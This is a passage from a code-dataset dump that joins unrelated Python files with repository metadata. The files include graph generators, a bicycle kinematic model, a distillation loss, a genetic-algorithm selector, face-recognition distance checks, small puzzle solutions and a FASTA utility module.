| submask_2) return edge_list[mask] def star(num_nodes: int, directed: bool = False) -> NDArray: """ Returns a star graph. Parameters ---------- num_nodes : int The number of nodes directed : bool, optional If set to True, will return a directed graph, by default False Returns ------- NDArray The star graph (num_edges x 2) """ edges = np.stack([np.zeros((num_nodes - 1, ), dtype = int), np.arange(1, num_nodes)], axis=1) if not directed: edges = to_undirected(edges) return edges def random_tree(num_nodes: int, directed: bool = True, rng: Optional[Generator] = None) -> NDArray: """ Returns a random tree computed using a random Prufer sequence. Parameters ---------- num_nodes : int [description] directed : bool, optional If set to True, will return a directed graph, by default True rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The random tree (num_edges x 2) """ if rng is None: rng = default_rng() prufer_seq = [rng.choice(range(num_nodes)) for _ in range(num_nodes - 2)] # Node degree is equivalent to the number of times it appears in the sequence + 1 degree = Counter(prufer_seq + list(range(num_nodes))) edges = [] visited = set() for v in prufer_seq: for u in range(num_nodes): if degree[u] == 1: edges.append([v, u]) degree[v] -= 1 degree[u] -= 1 visited.add(u) break u, v = degree.keys() - visited edges.append([u,v]) edges = np.asarray(edges) if not directed: edges = to_undirected(edges) return edges
en
0.720879
Returns a random graph, also known as an Erdos-Renyi graph or a binomial graph. The model chooses each of the possible edges with a defined probability. Parameters ---------- num_nodes : int The number of nodes prob : float Probability of an edge directed : bool, optional If set to True, will return a directed graph, by default False rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The random graph (num_edges x 2) Returns a graph sampled from the Barabasi-Albert (BA) model. The graph is built incrementally by adding `num_edges` arcs from a new node to already existing ones with preferential attachment towards nodes with high degree. Parameters ---------- num_nodes : int The number of nodes num_edges : int The number of edges rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The Barabasi-Albert (num_edges x 2) Returns a complete graph, a.k.a. a clique. Parameters ---------- num_nodes : int The number of nodes Returns ------- NDArray The clique (num_edges x 2) Returns a stochastic block model graph. This model partitions the nodes into blocks of defined sizes, and places edges between pairs of nodes depending on a probability matrix. Such a matrix specifies edge probabilities between and inside blocks. Parameters ---------- block_sizes : List[int] Sizes of blocks probs : List[List[float]] The squared probability matrix (num_blocks x num_blocks). The element i,j represents the edge probability between blocks i and j. The element i,i define the edge probability inside block i. generator : Callable A callable that generates communities with size depending on block_sizes rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The stochastic block model graph (num_edges x 2) # Update communities's indices # Compute iter-block links Returns a full two-dimensional rectangular grid lattice graph. Example 1 - 2 - 3 | X | X | 4 - 5 - 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The full two-dimensional rectangular grid lattice graph (num_edges x 2) Returns a two-dimensional rectangular grid lattice graph. Example 1 -- 2 -- 3 | | | 4 -- 5 -- 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The two-dimensional rectangular grid lattice graph (num_edges x 2) Ausiliar function for grid graph generation. Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis kernel : NDArray The kernel Returns ------- NDArray The two-dimensional grid lattice graph (num_edges x 2) # Remove edges (u,v) from a boundary node to the first node of the new row. # As the graph is undirected, remove the corresponding edges (v, u). Returns a star graph. Parameters ---------- num_nodes : int The number of nodes directed : bool, optional If set to True, will return a directed graph, by default False Returns ------- NDArray The star graph (num_edges x 2) Returns a random tree computed using a random Prufer sequence. Parameters ---------- num_nodes : int [description] directed : bool, optional If set to True, will return a directed graph, by default True rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The random tree (num_edges x 2) # Node degree is equivalent to the number of times it appears in the sequence + 1
3.228185
3
command_prediction/bicycle.py
fiit-team-08/car-components-app
0
6618566
from math import cos, sin, tan, atan2 import numpy as np class BicycleKinematicModel: def __init__(self, x, y, steering_angle, heading_angle, bicycle_len=1, time_step=0.1): self._x = x # meters self._y = y # meters self._steering_angle = steering_angle # radians self._heading_angle = heading_angle # radians self.bicycle_len = bicycle_len # meters self.time_step = time_step # seconds def get_state(self): return self._x, self._y, self._steering_angle, self._heading_angle def change_state(self, velocity, steering_rate): """ Changes its state according to the input: a velocity and a steering rate. The next state is evaluated regarding the reference point at the rear axle. Parameters =========== velocity : float Current velocity of a bicycle. steering_rate : float Angle change rate. """ if self._steering_angle == 0: rotation_rate = 0 else: R = self.bicycle_len / tan(self._steering_angle) rotation_rate = velocity / R delta_x = velocity * cos(self._heading_angle) delta_y = velocity * sin(self._heading_angle) delta_theta = rotation_rate delta_sigma = steering_rate self._x += delta_x * self.time_step self._y += delta_y * self.time_step self._heading_angle += delta_theta * self.time_step self._heading_angle = np.deg2rad(np.rad2deg(atan2(sin(self._heading_angle), cos(self._heading_angle))) % 360) self._steering_angle += delta_sigma
from math import cos, sin, tan, atan2 import numpy as np class BicycleKinematicModel: def __init__(self, x, y, steering_angle, heading_angle, bicycle_len=1, time_step=0.1): self._x = x # meters self._y = y # meters self._steering_angle = steering_angle # radians self._heading_angle = heading_angle # radians self.bicycle_len = bicycle_len # meters self.time_step = time_step # seconds def get_state(self): return self._x, self._y, self._steering_angle, self._heading_angle def change_state(self, velocity, steering_rate): """ Changes its state according to the input: a velocity and a steering rate. The next state is evaluated regarding the reference point at the rear axle. Parameters =========== velocity : float Current velocity of a bicycle. steering_rate : float Angle change rate. """ if self._steering_angle == 0: rotation_rate = 0 else: R = self.bicycle_len / tan(self._steering_angle) rotation_rate = velocity / R delta_x = velocity * cos(self._heading_angle) delta_y = velocity * sin(self._heading_angle) delta_theta = rotation_rate delta_sigma = steering_rate self._x += delta_x * self.time_step self._y += delta_y * self.time_step self._heading_angle += delta_theta * self.time_step self._heading_angle = np.deg2rad(np.rad2deg(atan2(sin(self._heading_angle), cos(self._heading_angle))) % 360) self._steering_angle += delta_sigma
en
0.848777
# meters # meters # radians # radians # meters # seconds Changes its state according to the input: a velocity and a steering rate. The next state is evaluated regarding the reference point at the rear axle. Parameters =========== velocity : float Current velocity of a bicycle. steering_rate : float Angle change rate.
3.530833
4
src/app.py
aaditkamat/Audily
6
6618567
<gh_stars>1-10 import requests, json, cv2, glob, os from playsound import playsound addr = 'http://localhost:5000' test_url = addr + '/audify' content_type = 'image/jpeg' headers = {'content-type': content_type} img = cv2.imread('../assets/book1.jpg') _, img_encoded = cv2.imencode('.jpg', img) response = requests.post(test_url, data=img_encoded.tostring(), headers=headers) list_of_files = glob.glob('./all_recordings/*') latest_file = max(list_of_files, key=os.path.getctime) print (latest_file) playsound(latest_file)
import requests, json, cv2, glob, os from playsound import playsound addr = 'http://localhost:5000' test_url = addr + '/audify' content_type = 'image/jpeg' headers = {'content-type': content_type} img = cv2.imread('../assets/book1.jpg') _, img_encoded = cv2.imencode('.jpg', img) response = requests.post(test_url, data=img_encoded.tostring(), headers=headers) list_of_files = glob.glob('./all_recordings/*') latest_file = max(list_of_files, key=os.path.getctime) print (latest_file) playsound(latest_file)
none
1
2.520042
3
app/migrations/0005_cache.py
taojy123/Babylon
0
6618568
<gh_stars>0 # Generated by Django 3.0.8 on 2020-08-04 07:30 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0004_auto_20200804_1141'), ] operations = [ migrations.CreateModel( name='Cache', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('cookie', models.TextField(blank=True)), ('tk', models.TextField(blank=True)), ], ), ]
# Generated by Django 3.0.8 on 2020-08-04 07:30 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0004_auto_20200804_1141'), ] operations = [ migrations.CreateModel( name='Cache', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('cookie', models.TextField(blank=True)), ('tk', models.TextField(blank=True)), ], ), ]
en
0.825327
# Generated by Django 3.0.8 on 2020-08-04 07:30
1.698732
2
workin/exts/auth/hasher.py
waderly/workin
1
6618569
#!/usr/bin/env python # -*- coding: utf-8 -*- try: from django_hasher import check_password, make_password except ImportError: import bcrypt def make_password(password): return bcrypt.hashpw(password, bcrypt.gensalt()) def check_password(password, hashed): return bcrypt.hashpw(password, hashed) == hashed
#!/usr/bin/env python # -*- coding: utf-8 -*- try: from django_hasher import check_password, make_password except ImportError: import bcrypt def make_password(password): return bcrypt.hashpw(password, bcrypt.gensalt()) def check_password(password, hashed): return bcrypt.hashpw(password, hashed) == hashed
en
0.352855
#!/usr/bin/env python # -*- coding: utf-8 -*-
2.375114
2
srcs/dist_loss.py
cs6787/PIXOR
0
6618570
<reponame>cs6787/PIXOR import torch import torch.nn as nn import torch.nn.functional as F ### LOSS FUNCTION FOR KNOWLEDGE DISTILLATION ### class CustomDistLoss(nn.Module): def __init__(self, device, config, num_classes=1): super(CustomDistLoss, self).__init__() self.num_classes = num_classes self.device = device self.alpha = config['alpha'] # used to reduce cross entropy loss self.beta = config['beta'] # used to reduce regression loss # weight between teacher and training loss self.mew = config['mew'] self.nu = config['nu'] self.margin = config['margin'] # calculates the binary cross entropy loss between x and y # given that x and y have dimensions [batch_size, 1, 200, 175] def cross_entropy(self, x, y): return F.binary_cross_entropy(input=x, target=y, reduction='mean') def teacher_reg_loss(self, loc_preds, loc_teacher_preds, loc_targets): student_squared_diff = torch.square(loc_preds - loc_targets) teacher_squared_diff = torch.square(loc_teacher_preds - loc_targets) # to determine whether to keep the student squared difference check_margin = torch.gt(student_squared_diff + self.margin, teacher_squared_diff) reg_error = check_margin * student_squared_diff #reg_error = torch.sum(reg_error) return reg_error def forward(self, preds, teacher_preds, targets): batch_size = targets.size(0) cls_targets, loc_targets = targets.split([1, 6], dim=1) if preds.size(1) == 7: cls_preds, loc_preds = preds.split([1, 6], dim=1) cls_teacher_preds, loc_teacher_preds = teacher_preds.split([ 1, 6], dim=1) elif preds.size(1) == 15: cls_preds, loc_preds, _ = preds.split([1, 6, 8], dim=1) cls_teacher_preds, loc_teacher_preds, _ = teacher_preds.split([ 1, 6, 8], dim=1) test = cls_preds.sum() test2 = loc_preds.sum() if torch.isnan(test): print("Classification returning nans") if torch.isnan(test2): print("Regression is returning nans") # calculating cross entropy with respect to the training data cls_loss_training = self.cross_entropy( cls_preds, cls_targets) # calculating cross entropy with respect to the teacher data cls_loss_teacher = self.cross_entropy( cls_preds, cls_teacher_preds) # adding the two cross entropies together - factor alpha to lower cross entropy loss cls_loss = (self.mew * cls_loss_training + (1 - self.mew) * cls_loss_teacher) * self.alpha # only evaluating regression on points where the targets are non-zero (for classification) # this is because regression can be very wrong and contradictory to the ground truth pos_pixels_targets = cls_targets.sum() #print("Pos pixel targets is: ", pos_pixels_targets) # calculating regression loss with respect to target values # multiply by beta, regression reduction factor if pos_pixels_targets > 0: loc_loss_training = F.smooth_l1_loss( cls_targets * loc_preds, loc_targets, reduction='sum') / pos_pixels_targets * self.beta loc_loss_teacher = self.teacher_reg_loss( cls_targets * loc_preds, cls_targets * loc_teacher_preds, loc_targets) loc_loss_teacher = torch.sum( loc_loss_teacher) / pos_pixels_targets * self.beta else: loc_loss_training = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss_teacher = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss = loc_loss_training + loc_loss_teacher * self.nu # print(cls_loss_training) # print(cls_loss_training.device) #cpu_device = torch.device('cpu') # print(cls_loss_training.to(cpu_device)) # print(cls_loss_training.device) loss = cls_loss + loc_loss cls = cls_loss_training.item() * self.mew * self.alpha cls_teacher = cls_loss_teacher.item() * (1 - self.mew) * self.alpha loc = loc_loss_training.item() loc_teacher = loc_loss_teacher.item() * self.nu # print("break") # print("Loss: ", str(loss.item())) # print("Cls loss: ", str(cls)) # print("Cls loss teacher: ", str(cls_teacher)) # print("Regression loss: ", str(loc)) # print("Regression loss teacher: ", str(loc_teacher)) return loss, cls, loc, cls_teacher, loc_teacher
import torch import torch.nn as nn import torch.nn.functional as F ### LOSS FUNCTION FOR KNOWLEDGE DISTILLATION ### class CustomDistLoss(nn.Module): def __init__(self, device, config, num_classes=1): super(CustomDistLoss, self).__init__() self.num_classes = num_classes self.device = device self.alpha = config['alpha'] # used to reduce cross entropy loss self.beta = config['beta'] # used to reduce regression loss # weight between teacher and training loss self.mew = config['mew'] self.nu = config['nu'] self.margin = config['margin'] # calculates the binary cross entropy loss between x and y # given that x and y have dimensions [batch_size, 1, 200, 175] def cross_entropy(self, x, y): return F.binary_cross_entropy(input=x, target=y, reduction='mean') def teacher_reg_loss(self, loc_preds, loc_teacher_preds, loc_targets): student_squared_diff = torch.square(loc_preds - loc_targets) teacher_squared_diff = torch.square(loc_teacher_preds - loc_targets) # to determine whether to keep the student squared difference check_margin = torch.gt(student_squared_diff + self.margin, teacher_squared_diff) reg_error = check_margin * student_squared_diff #reg_error = torch.sum(reg_error) return reg_error def forward(self, preds, teacher_preds, targets): batch_size = targets.size(0) cls_targets, loc_targets = targets.split([1, 6], dim=1) if preds.size(1) == 7: cls_preds, loc_preds = preds.split([1, 6], dim=1) cls_teacher_preds, loc_teacher_preds = teacher_preds.split([ 1, 6], dim=1) elif preds.size(1) == 15: cls_preds, loc_preds, _ = preds.split([1, 6, 8], dim=1) cls_teacher_preds, loc_teacher_preds, _ = teacher_preds.split([ 1, 6, 8], dim=1) test = cls_preds.sum() test2 = loc_preds.sum() if torch.isnan(test): print("Classification returning nans") if torch.isnan(test2): print("Regression is returning nans") # calculating cross entropy with respect to the training data cls_loss_training = self.cross_entropy( cls_preds, cls_targets) # calculating cross entropy with respect to the teacher data cls_loss_teacher = self.cross_entropy( cls_preds, cls_teacher_preds) # adding the two cross entropies together - factor alpha to lower cross entropy loss cls_loss = (self.mew * cls_loss_training + (1 - self.mew) * cls_loss_teacher) * self.alpha # only evaluating regression on points where the targets are non-zero (for classification) # this is because regression can be very wrong and contradictory to the ground truth pos_pixels_targets = cls_targets.sum() #print("Pos pixel targets is: ", pos_pixels_targets) # calculating regression loss with respect to target values # multiply by beta, regression reduction factor if pos_pixels_targets > 0: loc_loss_training = F.smooth_l1_loss( cls_targets * loc_preds, loc_targets, reduction='sum') / pos_pixels_targets * self.beta loc_loss_teacher = self.teacher_reg_loss( cls_targets * loc_preds, cls_targets * loc_teacher_preds, loc_targets) loc_loss_teacher = torch.sum( loc_loss_teacher) / pos_pixels_targets * self.beta else: loc_loss_training = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss_teacher = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss = loc_loss_training + loc_loss_teacher * self.nu # print(cls_loss_training) # print(cls_loss_training.device) #cpu_device = torch.device('cpu') # print(cls_loss_training.to(cpu_device)) # print(cls_loss_training.device) loss = cls_loss + loc_loss cls = cls_loss_training.item() * self.mew * self.alpha cls_teacher = cls_loss_teacher.item() * (1 - self.mew) * self.alpha loc = loc_loss_training.item() loc_teacher = loc_loss_teacher.item() * self.nu # print("break") # print("Loss: ", str(loss.item())) # print("Cls loss: ", str(cls)) # print("Cls loss teacher: ", str(cls_teacher)) # print("Regression loss: ", str(loc)) # print("Regression loss teacher: ", str(loc_teacher)) return loss, cls, loc, cls_teacher, loc_teacher
en
0.823113
### LOSS FUNCTION FOR KNOWLEDGE DISTILLATION ### # used to reduce cross entropy loss # used to reduce regression loss # weight between teacher and training loss # calculates the binary cross entropy loss between x and y # given that x and y have dimensions [batch_size, 1, 200, 175] # to determine whether to keep the student squared difference #reg_error = torch.sum(reg_error) # calculating cross entropy with respect to the training data # calculating cross entropy with respect to the teacher data # adding the two cross entropies together - factor alpha to lower cross entropy loss # only evaluating regression on points where the targets are non-zero (for classification) # this is because regression can be very wrong and contradictory to the ground truth #print("Pos pixel targets is: ", pos_pixels_targets) # calculating regression loss with respect to target values # multiply by beta, regression reduction factor # avoiding divide by 0 errors # avoiding divide by 0 errors # print(cls_loss_training) # print(cls_loss_training.device) #cpu_device = torch.device('cpu') # print(cls_loss_training.to(cpu_device)) # print(cls_loss_training.device) # print("break") # print("Loss: ", str(loss.item())) # print("Cls loss: ", str(cls)) # print("Cls loss teacher: ", str(cls_teacher)) # print("Regression loss: ", str(loc)) # print("Regression loss teacher: ", str(loc_teacher))
2.725894
3
src/pygenec/selecao/classificacao.py
duducosmos/pygenec
1
6618571
<reponame>duducosmos/pygenec<gh_stars>1-10 #!/usr/bin/env python3.6 # -*- Coding: UTF-8 -*- """ Roleta de Seleção de Indivíduos para cruzamento, classificação. Programa sob licença GNU V.3. Desenvolvido por: <NAME>. Versão 0.0.1. """ from numpy.random import random from numpy import array, argsort from .selecao import Selecao class Classificacao(Selecao): """ Seleciona indivíduos para cruzamento usando Classificação. Recebe como entrada: populacao - Objeto criado a partir da classe Populacao. """ def __init__(self, populacao): super(Classificacao, self).__init__(populacao) def selecionar(self, fitness): """Roleta de seleção de indivíduos.""" if fitness is None: fitness = self.populacao.avaliar() classificacao = argsort(fitness) + 1 total = classificacao.sum() parada = total * random() parcial = 0 i = 0 while True: if i > fitness.size - 1: break parcial += classificacao[i] if parcial >= parada: break i += 1 return i - 1
#!/usr/bin/env python3.6 # -*- Coding: UTF-8 -*- """ Roleta de Seleção de Indivíduos para cruzamento, classificação. Programa sob licença GNU V.3. Desenvolvido por: <NAME>. Versão 0.0.1. """ from numpy.random import random from numpy import array, argsort from .selecao import Selecao class Classificacao(Selecao): """ Seleciona indivíduos para cruzamento usando Classificação. Recebe como entrada: populacao - Objeto criado a partir da classe Populacao. """ def __init__(self, populacao): super(Classificacao, self).__init__(populacao) def selecionar(self, fitness): """Roleta de seleção de indivíduos.""" if fitness is None: fitness = self.populacao.avaliar() classificacao = argsort(fitness) + 1 total = classificacao.sum() parada = total * random() parcial = 0 i = 0 while True: if i > fitness.size - 1: break parcial += classificacao[i] if parcial >= parada: break i += 1 return i - 1
pt
0.959718
#!/usr/bin/env python3.6 # -*- Coding: UTF-8 -*- Roleta de Seleção de Indivíduos para cruzamento, classificação. Programa sob licença GNU V.3. Desenvolvido por: <NAME>. Versão 0.0.1. Seleciona indivíduos para cruzamento usando Classificação. Recebe como entrada: populacao - Objeto criado a partir da classe Populacao. Roleta de seleção de indivíduos.
3.240047
3
keyboardstream2py/__init__.py
i2mint/keyboardstream2py
0
6618572
"""Keyboard input stream2py interface""" from keyboardstream2py.keyboard_input import KeyboardInputSourceReader
"""Keyboard input stream2py interface""" from keyboardstream2py.keyboard_input import KeyboardInputSourceReader
en
0.589219
Keyboard input stream2py interface
1.291462
1
mercury_engine_data_structures/adapters/offset.py
duncathan/mercury-engine-data-structures
2
6618573
from construct import Adapter, AdaptationError class OffsetAdapter(Adapter): # stores offsets as indices def _get_table(self, context): raise NotImplementedError() def _get_table_length(self, context): raise NotImplementedError() def _get_base_offset(self, context): return 0 def _get_item_size(self, item): return item.size def _decode(self, obj, context, path): table = self._get_table(context) offset = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if size == offset: return i if size > offset: raise AdaptationError("No string begins at the requested offset!") item = table[i] size += self._get_item_size(item) def _encode(self, obj, context, path): table = self._get_table(context) index = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if i == index: return size item = table[i] size += self._get_item_size(item)
from construct import Adapter, AdaptationError class OffsetAdapter(Adapter): # stores offsets as indices def _get_table(self, context): raise NotImplementedError() def _get_table_length(self, context): raise NotImplementedError() def _get_base_offset(self, context): return 0 def _get_item_size(self, item): return item.size def _decode(self, obj, context, path): table = self._get_table(context) offset = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if size == offset: return i if size > offset: raise AdaptationError("No string begins at the requested offset!") item = table[i] size += self._get_item_size(item) def _encode(self, obj, context, path): table = self._get_table(context) index = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if i == index: return size item = table[i] size += self._get_item_size(item)
en
0.968439
# stores offsets as indices
2.647463
3
app/eSignature/examples/eg019_access_code_authentication/__init__.py
olegliubimov/code-examples-python
21
6618574
from .views import eg019
from .views import eg019
none
1
1.049578
1
face_distance.py
mostofashakib/Image-Analysis-and-Real-Time-Face-Recognition-system
0
6618575
<filename>face_distance.py import face_recognition """ Goal: Check if two faces are a match or not using that face_distance function from face_recognition. Metrics: The model is trained in a way that faces with a distance of 0.6 or less are a match. A strict cut off of 0.5 is imposed. Although it increases the risk of more false negatives but the number of false positive matches are reduced. Observations: This isn't exactly the same as a "percent match". The scale isn't linear. But it's safe to assume that images with a smaller distance are more similar to each other than ones with a larger distance. """ # Load some images to compare against known_obama_image = face_recognition.load_image_file("obama.jpg") known_biden_image = face_recognition.load_image_file("biden.jpg") # Get the face encodings for the known images obama_face_encoding = face_recognition.face_encodings(known_obama_image)[0] biden_face_encoding = face_recognition.face_encodings(known_biden_image)[0] known_encodings = [ obama_face_encoding, biden_face_encoding ] # Load a test image and get encondings for it image_to_test = face_recognition.load_image_file("obama2.jpg") image_to_test_encoding = face_recognition.face_encodings(image_to_test)[0] # See how far apart the test image is from the known faces face_distances = face_recognition.face_distance(known_encodings, image_to_test_encoding) for i, face_distance in enumerate(face_distances): print("The test image has a distance of {:.2} from known image #{}".format(face_distance, i)) print("- With a normal cutoff of 0.6, would the test image match the known image? {}".format(face_distance < 0.6)) print("- With a very strict cutoff of 0.5, would the test image match the known image? {}".format(face_distance < 0.5)) if face_distance < 0.5: print("- This is the 44th US President Barak Obama") else: print("- This is not President Barak Obama") print()
<filename>face_distance.py import face_recognition """ Goal: Check if two faces are a match or not using that face_distance function from face_recognition. Metrics: The model is trained in a way that faces with a distance of 0.6 or less are a match. A strict cut off of 0.5 is imposed. Although it increases the risk of more false negatives but the number of false positive matches are reduced. Observations: This isn't exactly the same as a "percent match". The scale isn't linear. But it's safe to assume that images with a smaller distance are more similar to each other than ones with a larger distance. """ # Load some images to compare against known_obama_image = face_recognition.load_image_file("obama.jpg") known_biden_image = face_recognition.load_image_file("biden.jpg") # Get the face encodings for the known images obama_face_encoding = face_recognition.face_encodings(known_obama_image)[0] biden_face_encoding = face_recognition.face_encodings(known_biden_image)[0] known_encodings = [ obama_face_encoding, biden_face_encoding ] # Load a test image and get encondings for it image_to_test = face_recognition.load_image_file("obama2.jpg") image_to_test_encoding = face_recognition.face_encodings(image_to_test)[0] # See how far apart the test image is from the known faces face_distances = face_recognition.face_distance(known_encodings, image_to_test_encoding) for i, face_distance in enumerate(face_distances): print("The test image has a distance of {:.2} from known image #{}".format(face_distance, i)) print("- With a normal cutoff of 0.6, would the test image match the known image? {}".format(face_distance < 0.6)) print("- With a very strict cutoff of 0.5, would the test image match the known image? {}".format(face_distance < 0.5)) if face_distance < 0.5: print("- This is the 44th US President Barak Obama") else: print("- This is not President Barak Obama") print()
en
0.949392
Goal: Check if two faces are a match or not using that face_distance function from face_recognition. Metrics: The model is trained in a way that faces with a distance of 0.6 or less are a match. A strict cut off of 0.5 is imposed. Although it increases the risk of more false negatives but the number of false positive matches are reduced. Observations: This isn't exactly the same as a "percent match". The scale isn't linear. But it's safe to assume that images with a smaller distance are more similar to each other than ones with a larger distance. # Load some images to compare against # Get the face encodings for the known images # Load a test image and get encondings for it # See how far apart the test image is from the known faces #{}".format(face_distance, i))
3.620567
4
007-Reverse-Integer/solution01.py
Eroica-cpp/LeetCode
7
6618576
<reponame>Eroica-cpp/LeetCode #!/usr/bin/python # ============================================================================== # Author: <NAME> (<EMAIL>) # Date: May 1, 2015 # Question: 007-Reverse-Integer # Link: https://leetcode.com/problems/reverse-integer/ # ============================================================================== # Reverse digits of an integer. # # Example1: x = 123, return 321 # Example2: x = -123, return -321 # ============================================================================== class Solution: # @param {integer} x # @return {integer} def reverse(self, x): if x < 0: return -self.reverse(-x) else: res = 0 while x: res = 10 * res + x % 10 x = x / 10 if res >= 2147483648: return 0 else: return res
#!/usr/bin/python # ============================================================================== # Author: <NAME> (<EMAIL>) # Date: May 1, 2015 # Question: 007-Reverse-Integer # Link: https://leetcode.com/problems/reverse-integer/ # ============================================================================== # Reverse digits of an integer. # # Example1: x = 123, return 321 # Example2: x = -123, return -321 # ============================================================================== class Solution: # @param {integer} x # @return {integer} def reverse(self, x): if x < 0: return -self.reverse(-x) else: res = 0 while x: res = 10 * res + x % 10 x = x / 10 if res >= 2147483648: return 0 else: return res
en
0.426115
#!/usr/bin/python # ============================================================================== # Author: <NAME> (<EMAIL>) # Date: May 1, 2015 # Question: 007-Reverse-Integer # Link: https://leetcode.com/problems/reverse-integer/ # ============================================================================== # Reverse digits of an integer. # # Example1: x = 123, return 321 # Example2: x = -123, return -321 # ============================================================================== # @param {integer} x # @return {integer}
3.744515
4
Leetcode/reverseInteger.py
lyndsiWilliams/code-challenge-solutions
0
6618577
def reverseInteger(x): ''' [::-1] This slice statement will start at the end of the string and end at position 0, moving with the step -1''' num_str = str(x) answer = 0 if x == 0: answer = 0 elif num_str[0] == "-": # Remove - from end of reversed string, add to front answer = int("-" + num_str[:0:-1]) else: # Normal reversal answer = int(num_str[::-1]) if answer not in range(-2**31, 2**31): print(0) else: print(answer) reverseInteger(120)
def reverseInteger(x): ''' [::-1] This slice statement will start at the end of the string and end at position 0, moving with the step -1''' num_str = str(x) answer = 0 if x == 0: answer = 0 elif num_str[0] == "-": # Remove - from end of reversed string, add to front answer = int("-" + num_str[:0:-1]) else: # Normal reversal answer = int(num_str[::-1]) if answer not in range(-2**31, 2**31): print(0) else: print(answer) reverseInteger(120)
en
0.810896
[::-1] This slice statement will start at the end of the string and end at position 0, moving with the step -1 # Remove - from end of reversed string, add to front # Normal reversal
4.027596
4
biosapi/core/__init__.py
Fxe/biosapi
0
6618578
<filename>biosapi/core/__init__.py<gh_stars>0 import biosapi.core.model from biosapi.core.bios_database_reaction import BiosDatabaseReaction
<filename>biosapi/core/__init__.py<gh_stars>0 import biosapi.core.model from biosapi.core.bios_database_reaction import BiosDatabaseReaction
none
1
1.062868
1
2020/18/18.py
pshatov/AoC
0
6618579
<reponame>pshatov/AoC<gh_stars>0 LINES = [] with open('input.txt') as f: for fl in f: LINES.append('(' + fl.strip() + ')') def extract_brackets(l): i_start = 0 for i_stop in range(1, len(l)): if l[i_stop] == ')': a = '' if i_start == 0 else l[0:i_start] b = l[i_start+1:i_stop] c = '' if i_stop == len(l)-1 else l[i_stop+1:len(l)] return a, b, c elif l[i_stop] == '(': i_start = i_stop raise RuntimeError def simplify_brackets1(b): bl = b.split(' ') r = int(bl[0]) for bi in range(1, len(bl), 2): bx, by = bl[bi], int(bl[bi+1]) if bx == '+': r += by elif bx == '*': r *= by return r def simplify_brackets2(b): bl = b.split(' ') while '+' in bl: for bi in range(1, len(bl), 2): if bl[bi] == '+': bl[bi] = str(int(bl[bi-1]) + int(bl[bi+1])) del bl[bi+1] del bl[bi-1] break r = int(bl[0]) for bi in range(2, len(bl), 2): r *= int(bl[bi]) return r def parse_line1(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets1(b) l = a + str(bb) + c return int(bb) def parse_line2(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets2(b) l = a + str(bb) + c return int(bb) s1 = 0 s2 = 0 for l in LINES: s1 += parse_line1(l) s2 += parse_line2(l) print("s1: %d" % s1) print("s2: %d" % s2)
LINES = [] with open('input.txt') as f: for fl in f: LINES.append('(' + fl.strip() + ')') def extract_brackets(l): i_start = 0 for i_stop in range(1, len(l)): if l[i_stop] == ')': a = '' if i_start == 0 else l[0:i_start] b = l[i_start+1:i_stop] c = '' if i_stop == len(l)-1 else l[i_stop+1:len(l)] return a, b, c elif l[i_stop] == '(': i_start = i_stop raise RuntimeError def simplify_brackets1(b): bl = b.split(' ') r = int(bl[0]) for bi in range(1, len(bl), 2): bx, by = bl[bi], int(bl[bi+1]) if bx == '+': r += by elif bx == '*': r *= by return r def simplify_brackets2(b): bl = b.split(' ') while '+' in bl: for bi in range(1, len(bl), 2): if bl[bi] == '+': bl[bi] = str(int(bl[bi-1]) + int(bl[bi+1])) del bl[bi+1] del bl[bi-1] break r = int(bl[0]) for bi in range(2, len(bl), 2): r *= int(bl[bi]) return r def parse_line1(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets1(b) l = a + str(bb) + c return int(bb) def parse_line2(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets2(b) l = a + str(bb) + c return int(bb) s1 = 0 s2 = 0 for l in LINES: s1 += parse_line1(l) s2 += parse_line2(l) print("s1: %d" % s1) print("s2: %d" % s2)
none
1
3.559525
4
core/ReadAndWrite.py
gieses/ARDEN
0
6618580
<reponame>gieses/ARDEN #!/usr/bin/env python ''' Created 2012 Contains various help functions which read or produce an input/ output @author: <NAME> ''' import os import random import HTSeq def readdna(filename): """ Reads in the dna sequence of the given fasta @type filename: string @param filename: Fasta-file used as input. @rtype: HTSeq Sequence object @return: Reference Fasta. """ chr = HTSeq.FastaReader(filename) for fasta in chr: referenz = HTSeq.Sequence(fasta.seq,fasta.name) return(referenz) def writefile(sequenceObject,filename): """ Writes a given sequence object to a fasta file. @type sequenceObject: HTSeq Sequence object @param sequenceObject: Reference sequence as fasta. """ outfasta = open(filename,"w") sequenceObject.write_to_fasta_file(outfasta) outfasta.close() def writeoverview(Ndic_G,aadic_G,Ndic_AR,aadic_AR,filename): """ Creates the "delta" file for the comparison of the two chromosoms. This file contains the differences in nucleotide distribution between reference and artificial. input: nucleotid dictionary genom, aa dictionary genome, nucleotid dictionary artificial chromosom, aa dictionary, filename @type Ndic_G: dictionary @param Ndic_G: Nucleotid dictionary genom. @type aadic_G: dictionary @param aadic_G: AA dictionary genome. @type Ndic_AR: dictionary @param Ndic_AR: Nucleotid dictionary artificial. @type aadic_AR: dictionary @param aadic_AR: AA dictionary artificial @type filename: string @param filename: Output filename. """ fobj = open(filename,"w") fobj.write("NUC /AA \t Genom 